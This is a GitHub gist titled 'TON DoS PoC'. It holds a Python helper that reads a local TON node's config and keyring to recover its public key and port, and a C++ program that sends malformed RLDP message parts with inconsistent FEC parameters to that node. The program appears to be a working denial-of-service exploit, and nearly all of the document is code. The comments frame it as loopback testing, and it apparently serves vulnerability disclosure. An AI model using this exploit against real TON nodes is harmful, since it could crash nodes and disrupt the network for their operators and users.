
@this-is-chainlight
Created July 6, 2023 13:11
TON DoS PoC
#!/usr/bin/python3
# pip install pynacl
from nacl.signing import SigningKey
from nacl.encoding import HexEncoder
import codecs
import json
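# Helper for the operator of a local TON node: reads the node's own
# config.json and keyring and prints the ADNL public key and UDP port that
# the C++ test program on this page expects as its PUBKEY / PORT values.
# It must run as a user allowed to read /var/ton-work/db (the node's files).
with open("/var/ton-work/db/config.json", "r") as config_file:
    config = json.load(config_file)

# First address entry of type 'engine.addr' supplies the port.
port = None
for addr in config['addrs']:
    if addr['@type'] == 'engine.addr':
        port = addr['port']
        break
if port is None:
    # Fail with a clear message instead of printing "PORT None".
    raise SystemExit("config.json has no 'engine.addr' entry; cannot determine PORT")

# First ADNL identity with category 1 supplies the key id (base64 in config).
key_id = None
for adnl in config['adnl']:
    if adnl['category'] == 1:
        key_id = bytes(adnl['id'], 'ascii')
        break
if key_id is None:
    # Without this guard the base64 decode below fails with an opaque TypeError.
    raise SystemExit("config.json has no ADNL id with category 1; cannot locate key")

# Keyring files are named after the upper-case hex form of the key id.
key_id = codecs.encode(codecs.decode(key_id, 'base64'), 'hex').upper()

# The first 4 bytes of the keyring file are skipped; presumably a type tag
# that precedes the Ed25519 seed (TODO confirm against the keyring format).
# priv_key is secret key material: it is used only to derive the public key
# and is never printed or written anywhere by this script.
with open(b'/var/ton-work/db/keyring/' + key_id, 'rb') as key_file:
    priv_key = key_file.read()[4:]

sk = SigningKey(priv_key)
vk = sk.verify_key
print('PUBKEY', str(vk.encode(HexEncoder()), 'ascii'))
print('PORT', port)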
// Add lines below to CMakeLists.txt
// add_executable(test-exploit test/test-exploit.cpp)
// target_link_libraries(test-exploit adnl dht rldp fec tl_api)
#include "adnl/adnl-network-manager.h"
#include "adnl/adnl.h"
#include "rldp/rldp.h"
#include "fec/fec.h"
#include "auto/tl/ton_api.hpp"
#include "td/utils/port/signals.h"
#include "td/utils/port/path.h"
#include "td/utils/Random.h"
#include <memory>
#include <set>
// Test program from the "TON DoS PoC" gist. It starts a local ADNL stack,
// registers one peer (identified by a hard-coded Ed25519 public key and UDP
// address) and sends that peer two rldp.messagePart objects that share one
// transfer id. The peer address used below is inside the 127.0.0.0/8 loopback
// range, and the PUBKEY / PORT values are the ones the Python helper on this
// page reads from a node's own /var/ton-work/db files, i.e. the setup is
// written for a node run by the person executing the test.
int main() {
SET_VERBOSITY_LEVEL(verbosity_DEBUG);
td::set_default_failure_signal_handler().ensure();
// Actor handles are declared here so they outlive the lambdas below that
// create and use them.
td::actor::ActorOwn<ton::keyring::Keyring> keyring;
td::actor::ActorOwn<ton::adnl::AdnlNetworkManager> network_manager;
td::actor::ActorOwn<ton::adnl::Adnl> adnl;
// src: locally generated sender identity; dst: the peer under test.
ton::adnl::AdnlNodeIdShort src;
ton::adnl::AdnlNodeIdShort dst;
// NOTE(review): {1} presumably requests a single worker thread; confirm
// against td::actor::Scheduler.
td::actor::Scheduler scheduler({1});
// Phase 1: build the local ADNL stack and register both identities.
scheduler.run_in_context([&] {
// Both create() calls receive an empty string; presumably the database
// root, meaning nothing is persisted (TODO confirm).
keyring = ton::keyring::Keyring::create("");
adnl = ton::adnl::Adnl::create("", keyring.get());
network_manager = ton::adnl::AdnlNetworkManager::create(31337);
td::actor::send_closure(adnl, &ton::adnl::Adnl::register_network_manager, network_manager.get());
// Only bit 0 of the category mask is set for the local address.
ton::adnl::AdnlCategoryMask cat_mask;
cat_mask[0] = true;
// Local endpoint: 127.0.0.1:31337, matching the port given to create().
td::IPAddress addr;
addr.init_host_port("127.0.0.1", 31337).ensure();
td::actor::send_closure(network_manager, &ton::adnl::AdnlNetworkManager::add_self_addr, addr, std::move(cat_mask), 0);
// addr_list is versioned with the current system time and is used twice:
// first (still without addresses) for the local id, then, after the peer's
// UDP address is appended, for the peer.
ton::adnl::AdnlAddressList addr_list;
addr_list.set_version(static_cast<td::int32>(td::Clocks::system()));
{
// Sender identity: a fresh random Ed25519 key, stored in the keyring and
// registered as a local ADNL id. The trailing 0 is presumably the
// category, matching cat_mask[0] above (TODO confirm).
auto pk = ton::PrivateKey{ton::privkeys::Ed25519::random()};
auto pub = pk.compute_public_key();
td::actor::send_closure(keyring, &ton::keyring::Keyring::add_key, std::move(pk), true, [](td::Unit) {});
src = ton::adnl::AdnlNodeIdShort{pub.compute_short_id()};
td::actor::send_closure(adnl, &ton::adnl::Adnl::add_id, ton::adnl::AdnlNodeIdFull{pub}, addr_list, static_cast<td::uint8>(0));
}
{
// Peer identity: built from a hex-encoded Ed25519 public key.
auto pub_bits = td::Bits256();
// EDIT THIS (PUBKEY)
// Replace with the PUBKEY value printed by the Python helper for the test
// node. The result of from_hex() is not checked here, so a malformed hex
// string is not reported.
pub_bits.from_hex("0eb2156c9b2be5812ce3f78e003d08156545e251f232ea7e514ae8ec702b0ba2");
auto pub = ton::PublicKey{ton::pubkeys::Ed25519(pub_bits)};
dst = ton::adnl::AdnlNodeIdShort{pub.compute_short_id()};
// This addr shadows the outer addr declared earlier in the lambda.
td::IPAddress addr;
addr.init_host_port(
"127.127.127.127",
// EDIT THIS (PORT)
// Replace with the PORT value printed by the Python helper.
11174
).ensure();
ton::adnl::AdnlAddress x = ton::adnl::AdnlAddressImpl::create(ton::create_tl_object<ton::ton_api::adnl_address_udp>(addr.get_ipv4(), addr.get_port()));
addr_list.add_addr(std::move(x));
addr_list.set_version(static_cast<td::int32>(td::Clocks::system()));
td::actor::send_closure(adnl, &ton::adnl::Adnl::add_peer, src, ton::adnl::AdnlNodeIdFull{pub}, addr_list);
}
});
// Phase 2: send two message parts of the same transfer to the peer.
scheduler.run_in_context([&] {
td::Bits256 transfer_id;
td::Random::secure_bytes(transfer_id.as_slice());
// The declared FEC parameters do not agree with each other or with the
// message parts below: data_size is 0 and symbols_count is 0x1000, while
// each part announces total_size 1024 and carries a single byte.
// NOTE(review): the page does not say which receiver-side check this input
// exercises; a receiver should reject parts whose FEC parameters are
// inconsistent with total_size before constructing a decoder. Confirm
// against the fixed RLDP code.
ton::fec::FecType fec_type = td::fec::RoundRobinEncoder::Parameters{
// data_size
0,
// symbol_size
1,
// symbols_count
0x1000
};
// First part: part 0, seqno 0, one byte of payload ("1").
td::BufferSlice d1{"1"};
d1.truncate(1);
auto obj1 = ton::create_tl_object<ton::ton_api::rldp_messagePart>(
// part.transfer_id_
transfer_id,
// part.fec_type_
fec_type.tl(),
// part.part_
0,
// part.total_size_
1024,
// seqno
0,
// std::move(symbol.data)
std::move(d1)
);
// NOTE(review): the `true` passed to serialize_tl_object presumably selects
// the boxed encoding; confirm against the TL helpers.
td::actor::send_closure(adnl, &ton::adnl::Adnl::send_message, src, dst, serialize_tl_object(obj1, true));
// Second part: same transfer_id and FEC type, but part 1 and seqno 1, with
// one byte of payload ("2").
td::BufferSlice d2{"2"};
d2.truncate(1);
auto obj2 = ton::create_tl_object<ton::ton_api::rldp_messagePart>(
// part.transfer_id_
transfer_id,
// part.fec_type_
fec_type.tl(),
// part.part_
1,
// part.total_size_
1024,
// seqno
1,
// std::move(symbol.data)
std::move(d2)
);
td::actor::send_closure(adnl, &ton::adnl::Adnl::send_message, src, dst, serialize_tl_object(obj2, true));
});
// run() is called once, not in a loop; presumably this processes the queued
// closures for one scheduler iteration (TODO confirm).
scheduler.run();
// std::_Exit ends the process immediately without running destructors or
// atexit handlers, so the actors above are never torn down and the return
// statement below is unreachable.
std::_Exit(0);
return 0;
}